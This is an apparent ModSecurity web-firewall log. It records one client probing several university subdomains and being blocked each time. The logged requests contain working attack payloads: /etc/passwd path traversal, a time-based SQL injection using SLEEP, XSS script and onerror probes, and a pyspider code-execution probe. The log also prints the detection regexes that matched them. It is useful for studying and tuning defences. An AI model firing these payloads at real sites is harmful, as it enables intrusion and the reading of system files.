[Tue Aug 29 11:37:52.408933 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAUFdo0AAAA9"]
[Tue Aug 29 11:37:52.427153 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAXEH-4AAAAN"]
[Tue Aug 29 11:37:52.489525 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAXA9ksAAAAO"]
[Tue Aug 29 11:37:53.374687 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12IcCo-f0AAAXEIAIAAAAN"]
[Tue Aug 29 11:37:58.506084 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12JsCo-f0AAAUFdqMAAAA9"]
[Tue Aug 29 11:37:59.365113 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXVynUAAAAB"]
[Tue Aug 29 11:37:59.371880 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAUFdqcAAAA9"]
[Tue Aug 29 11:37:59.388819 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXWLHYAAAAD"]
[Tue Aug 29 11:37:59.419192 2023] [:error] [pid 1495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXXhe0AAAAF"]
[Tue Aug 29 11:37:59.419450 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXWLHcAAAAD"]
[Tue Aug 29 11:37:59.439363 2023] [:error] [pid 1495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXXhe4AAAAF"]
[Tue Aug 29 11:37:59.478627 2023] [:error] [pid 1495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXXhe8AAAAF"]
[Tue Aug 29 11:37:59.508197 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAUFdqwAAAA9"]
[Tue Aug 29 11:37:59.528116 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXVynsAAAAB"]
[Tue Aug 29 11:37:59.542967 2023] [:error] [pid 1495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXXhfIAAAAF"]
[Tue Aug 29 11:38:08.704057 2023] [:error] [pid 1519] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO12MMCo-f0AAAXviFIAAAAb"]
[Tue Aug 29 11:38:10.609911 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXWLKQAAAAD"]
[Tue Aug 29 11:38:10.711638 2023] [:error] [pid 1506] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXi3zwAAAAP"]
[Tue Aug 29 11:38:10.752475 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAV1EWEAAAAd"]
[Tue Aug 29 11:38:10.771318 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXEIC0AAAAN"]
[Tue Aug 29 11:38:10.772042 2023] [:error] [pid 1509] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12MsCo-f0AAAXlRnkAAAAV"]
[Tue Aug 29 11:38:10.785436 2023] [:error] [pid 1507] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXj8loAAAAQ"]
[Tue Aug 29 11:38:21.400922 2023] [:error] [pid 1523] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12PcCo-f0AAAXz7AcAAAAk"]
[Tue Aug 29 11:38:21.404565 2023] [:error] [pid 1525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12PcCo-f0AAAX1nxYAAAAm"]
[Tue Aug 29 11:38:23.357716 2023] [:error] [pid 1521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAXxYNIAAAAh"]
[Tue Aug 29 11:38:23.358555 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAXWLMAAAAAD"]
[Tue Aug 29 11:38:23.403430 2023] [:error] [pid 1532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAX8PQ8AAAAK"]
[Tue Aug 29 11:38:23.429086 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAXWLMMAAAAD"]
[Tue Aug 29 11:38:23.436485 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAXwLFEAAAAe"]
[Tue Aug 29 11:38:33.371464 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAXWLPUAAAAD"]
